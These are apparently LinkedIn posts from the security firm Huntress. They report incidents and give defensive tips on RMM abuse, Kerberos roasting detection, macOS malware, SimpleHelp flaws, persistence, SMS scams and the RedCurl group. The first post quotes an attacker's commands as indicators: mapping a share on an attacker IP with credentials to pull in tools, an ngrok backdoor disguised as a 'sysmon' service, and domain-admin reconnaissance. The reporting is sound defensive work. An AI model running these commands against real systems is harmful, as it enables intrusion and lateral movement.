Huntress

A threat actor compromised a privileged admin account to gain control of a legit Atera remote management infrastructure. From there, they pivoted across multiple organizations: 📂 They brought their tools across by network-joining a malicious share folder: net use \\147.45.79[.]160\folder /user:drakon StronGpass@@s 🚪 They set up an Ngrok backdoor as a Windows Service named 'sysmon': C:\programdata\ssh\nssm.exe 🪟They found the domain admins of the AD: C:\Windows\system32\net.exe group /domain "domain admins" Alongside an awesome partner, our SOC shut down the threat and kicked them out of the network. To keep your remote management infrastructure adversary-free, here’s some tips: ✅ Tightly control account proliferation and privilege ✅ Allow-listing IPs of access, where possible ✅ Have redundancy and 'kill switches' for the worst-case scenario where your trusted RMM is compromised

What’s PerfMon good for? If you’re looking for #Kerberos attacks, more than you’d think 👇 🔍 Performance Monitor (#PerfMon) counters can be used as alternative methods for detecting Kerberos roasting attacks, moving beyond traditional reliance on Windows Events 4768/4769 😈These counters have rich metadata that can give valuable context and seriously enhance detection capabilities 👁️ Revisiting some ideas from a 2018 Microsoft post, it turns out PerfMon can be a great tool for keeping an eye on authentication traffic Read the full PerfMon analysis from Andrew Schwartz here: https://lnkd.in/dyPuNvSj

Here’s why you don’t download sketchy content at work. Check this out 👇 🎵Someone used a free “YouTube to mp3” converter to download a song. They were served a malicious ad saying their machine had a virus and needed to download an app to fix it 👾 The downloaded application, called "Flash Player.dmg," actually ran a bash script that installed malicious files, both as persistence items and supporting binaries 💻 The malware also checked to see if it was running within a virtual machine We saw multiple behaviors from this #malware: persistence items, the commands it ran trying to evade detection, and the malicious script itself. It didn’t get very far once our SOC got tipped off to it, though. Want to learn more about threats like this? Stuart Ashenbrenner will be at our Huntress Roadshow in Houston on February 27. See you there: https://lnkd.in/e2_5gpDe

A commercial real estate company was compromised via an RMM tool 🏢 The threat actor used their initial access to drop ANOTHER remote access tool 🤯 They were in the process of modifying system firewall rules to gain further access and maybe even persistence via this secondary RMM tool when our SOC shut them down 🛡️ Remember to: ✅ Double check your RMM tools’ permissions ✅ Make sure auditing is enabled—this telemetry is critical during compromise ✅ Educate your users on safe RMM use

Feeling honored to join such an amazing young woman on her big 13th! 🎂 It’s moments like this that you appreciate just how important partnerships are for the greater good—businesses but also the families behind them 🫶 Thank you Entech US for doing your part to expertly secure companies of all sizes and making sure hackers can’t gain an inch against your clients! 💪 Happy Birthday Dana! 🎉

Another day, another supply chain attack: Horizon3.ai found vulnerabilities in SimpleHelp, a popular Remote Support Software. ⚠️ Remote Support Software “SimpleHelp” is vulnerable to multiple CVEs that can be leveraged for full compromise. ⚠️ Patches were released on January 13, and CVEs were assigned on January 14. What to do: ✅ If you haven’t done so already, PATCH NOW. Simple Help shared instructions here: https://lnkd.in/eWbJADHt ✅ If you choose to uninstall, use this guidance. https://lnkd.in/eJY7peyV ✅ If that does not work, try "C:\ProgramData\JWrapper-Remote-Access\JWAppsSharedConfig\SimpleService.exe" Uninstall And then: sc delete "Remote Access Service"

Persistent threats can last a while if they’re not dealt with. Check this out 👀 Back in 2018, a #healthcare diagnostic center had a user interact with some persistent malware. It secured footholds via: ➡️ A .LNK in the startup folder - c:\users\<REDACTED>\appdata\roaming\microsoft\windows\start menu\programs\startup\qvsejd.lnk ➡️ The .LNK would run - c:\users\<REDACTED>\appdata\roaming\mttn\bdeuisrv.exe ➡️ And via multiple Windows Services that ran suspicious binaries from C:\Windows—like %SystemRoot%\23783896.exe This #malware hung around for years—until our SOC got involved 🕵 Huntress was installed on the affected machine on January 3, 2025 at 15:48 UTC. Within an hour, ALL the malware in question was identified and eliminated 💪 Persistent malware is predictable. Here’s where you should check first when looking for it yourself: ✅ Uncommon scheduled tasks ✅ Users' Windows Registry Run keys ✅ And the Windows Start Up folder

Here’s how text scams go down 👇 📲 You get a text claiming there’s an issue with your USPS shipment. 📱 But the number has an international country code, yet it’s referencing USPS. 🔗 The link’s not clickable, but the message says replying will fix that. But here’s what happens if you reply: ✅ The link’s suddenly clickable and leads to a fake USPS site. ✅ Your number gets flagged as active, increasing scam texts. ✅ The scammers improve their chances of tricking others. Delete the message. Don’t interact. Learn how to spot these scams in the Huntress LinkedIn Newsletter

🔍 In late 2024, we spotted some suspicious activity across multiple Canadian organizations pointing to RedCurl, an APT group with a history of cyber espionage. 🕵️♀️ This wasn’t new—RedCurl’s been active since at least November 2023: 👻 They don’t encrypt systems, steal money, or demand ransoms. Instead, they hide for months, quietly stealing emails, corporate docs, and confidential files. 🌴 They target industries like wholesale retail, finance, tourism, insurance, construction, and consulting. We’ve been working to break down RedCurl’s unique tactics, show how they match past attacks, and share tips on spotting similar threats—from any adversary. Read the analysis from Greg Linares, Matt A., and Alden Schmidt here: https://lnkd.in/eJ45bpzB

Wasn’t kidding when we said “Cybersecurity for all businesses—not just the 1% with Formula 1 budgets” Massive congrats to our driver Franck Perera from Automobili Lamborghini S.p.A. for putting down the fastest lap yesterday in Daytona. #Rolex24